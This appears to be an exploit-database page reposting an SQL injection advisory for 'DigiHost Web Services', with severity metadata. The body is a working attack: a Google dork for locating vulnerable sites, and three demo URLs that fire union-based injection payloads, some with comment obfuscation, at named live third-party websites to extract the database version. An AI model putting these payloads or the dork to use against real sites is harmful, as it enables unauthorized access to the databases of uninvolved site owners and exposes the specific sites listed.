Advertisement






DigiHost Web Services - Sql Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-09-19
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 0.0578652 0.721319

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090098

Below is a copy:

DigiHost Web Services - Sql Injection Vulnerability
*********************************************************
#Exploit Title: DigiHost Web Services -  Sql Injection Vulnerability
#Date: 2021-09-19
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered By: DigiHost Web Services"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Powered By: DigiHost Web Services"


### Demo :

https://www.aranisfarmhaus.in/product-details.php?id=-2%27%20/*!12345union*/%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--+

https://www.inmajorcity.in/event.php?id=-8%27%20union%20select%201,2,3,version()--+

https://www.dhruvienterprise.co.in/product-details.php?id=-21%27%20/*!12345union*/%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+


********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.